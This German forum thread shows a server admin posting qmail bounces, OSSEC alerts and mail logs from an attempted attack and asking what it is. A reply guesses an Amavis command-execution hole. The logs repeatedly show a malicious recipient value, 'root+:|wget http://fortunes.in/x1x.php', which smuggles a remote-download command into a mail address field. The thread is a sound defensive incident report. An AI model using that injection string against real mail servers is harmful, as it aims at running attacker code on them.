Neuer Exploit?

H

Heimer

New Member
Ich habe heute zwei Mails von meinem vServer bekommen,
MAILER-DAEMON
Code: 
Hi. This is the qmail-send program at abcd.de.
I tried to deliver a bounce message to this address, but the bounce bounced!

<blue@dick.com>:
66.154.10.179 does not like recipient.
Remote host said: 550 <blue@dick.com>: Recipient address rejected: User unknown in relay recipient table
Giving up on 66.154.10.179.

--- Below this line is the original bounce.

Return-Path: <>
Received: (qmail 29825 invoked for bounce); 22 Apr 2010 02:14:38 +0200
Date: 22 Apr 2010 02:14:38 +0200
From: MAILER-DAEMON@abcd.de
To: blue@dick.com
Subject: failure notice

Hi. This is the qmail-send program at abcd.de.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[COLOR="Red"]root+:|wget http://fortunes.in/x1x.php@abcd.de[/COLOR]>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <blue@dick.com>
Received: (qmail 28461 invoked from network); 22 Apr 2010 02:14:29 +0200
Received: from server1.pagetank.com (HELO bluedick) (193.28.153.110)
  by abcd.de with SMTP; 22 Apr 2010 02:14:29 +0200

OSSEC
Code: 
OSSEC HIDS Notification.
2010 Apr 22 02:14:39

Received From: v12345->/var/log/syslog
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:39

Received From: v12345->/var/log/mail.info
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:47

Received From: v12345->/var/log/syslog
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:47

Received From: v12345->/var/log/mail.info
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./



 --END OF NOTIFICATION

Eine google Suche nach
Code: 
root+:|wget http://fortunes.in/x1x.php
bringt auch einige Treffer, allerdings beziehen die sich eher auf Postfix.
Die gefundenen Beiträge sind aber alle recht neu, es scheint also ein neuer Exploit zu sein.
Hier mal der Auszug aus der mail.info:
Code: 
Apr 22 02:14:29 v12345 /var/qmail/bin/relaylock[28456]: /var/qmail/bin/relaylock: mail from 193.28.153.110:36980 (server1.pagetank.com)
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: Handlers Filter before-queue for qmail started ...
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: from=blue@dick.com
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: to=root+:|wget http://fortunes.in/x1x.php
Apr 22 02:14:35 v12345 qmail: 1271895275.730583 new msg 29819599
Apr 22 02:14:35 v12345 qmail: 1271895275.730688 info msg 29819599: bytes 200 from <blue@dick.com> qp 28461 uid 2020
Apr 22 02:14:38 v12345 qmail: 1271895278.321365 starting delivery 426: msg 29819599 to local root+:|wget_http://fortunes.in/x1x.php@v12345.1blu.de
Apr 22 02:14:38 v12345 qmail: 1271895278.321430 status: local 1/10 remote 0/20
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: Handlers Filter before-local for qmail started ...
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: from=blue@dick.com
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: to=root+:|wget http://fortunes.in/x1x.php@v12345.1blu.de
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: mailbox: /var/qmail/alias 
Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/
Apr 22 02:14:38 v12345 qmail: 1271895278.462952 status: local 0/10 remote 0/20
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: Handlers Filter before-queue for qmail started ...
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: from=
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: to=blue@dick.com
Apr 22 02:14:42 v12345 qmail: 1271895282.873598 bounce msg 29819599 qp 29824
Apr 22 02:14:42 v12345 qmail: 1271895282.873682 end msg 29819599
Apr 22 02:14:42 v12345 qmail: 1271895282.875943 new msg 29819662
Apr 22 02:14:42 v12345 qmail: 1271895282.876026 info msg 29819662: bytes 762 from <> qp 29825 uid 2522
Apr 22 02:14:45 v12345 qmail: 1271895285.530506 starting delivery 427: msg 29819662 to remote blue@dick.com
Apr 22 02:14:45 v12345 qmail: 1271895285.530594 status: local 0/10 remote 1/20
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: Handlers Filter before-remote for qmail started ...
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: from=postmaster@v12345.1blu.de
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: to=blue@dick.com
Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./
Apr 22 02:14:47 v12345 qmail: 1271895287.111178 status: local 0/10 remote 0/20
Hat jemand vielleicht nähere Infos worum es sich dabei genau handelt?
 
Da versucht jemand eine Lücke in Amavis (?) auszunutzen, die es ermöglicht, mit solchen interessanten Empfängern beliebige Kommandos auf dem Server auszuführen.
Wenn dein Server aber so reagiert, ist scheinbar alles im grünen Bereich - habe heute auch so ein paar interessante Einlieferungsversuche gehabt.
Ich finde den Heise-Artikel dazu gerade leider nicht...
 
You must log in or register to reply here.
Back
Top